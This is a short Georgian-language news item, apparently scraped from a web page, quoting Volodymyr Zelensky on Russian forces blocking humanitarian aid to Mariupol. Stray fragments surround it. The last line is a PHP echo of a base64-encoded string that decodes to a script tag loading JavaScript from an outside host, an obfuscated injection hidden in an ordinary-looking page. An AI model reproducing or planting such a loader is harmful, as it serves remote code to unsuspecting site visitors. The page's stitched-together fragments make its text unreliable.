celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტმა ვოლოდიმირ ზელენსკიმ მარიუპოლში არსებულ ვითარებაზე ისაუბრა და თქვა, რომ ის გააგრძელებს მსოფლიოსთვის იმის მოყოლას, რა ხდება უკრაინის ქალაქებში.
 
"რუსი სამხედროები ქალაქში არანაირ ჰუმანიტარულ ტვირთს არ უშვებენ. გარდა იმ შემთხვევისა, როცა ისინი მარიუპოლის მცხოვრებლებს თავიანთ პროპაგანდისტულ სპექტაკლებში იყენებენ, თითქოს, დაიწყეს ხალხისთვის რაღაცის დარიგება. მე გავაგრძელებ სხვა ქვეყნების მოსახლობის დეტალურ ინფორმირებას დამპყრობლების ასეთი ამაზრზენი ცინიზმის შესახებ, რუსეთის ყველა ომის დანაშაულის შესახებ ჩვენი გმირი მარიუპოლისა და უკრაინის სხვა ქალაქების მშვიდობიანი მოსახლეობის წინააღმდეგ" - თქვა ზელენსკიმ. 
814
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");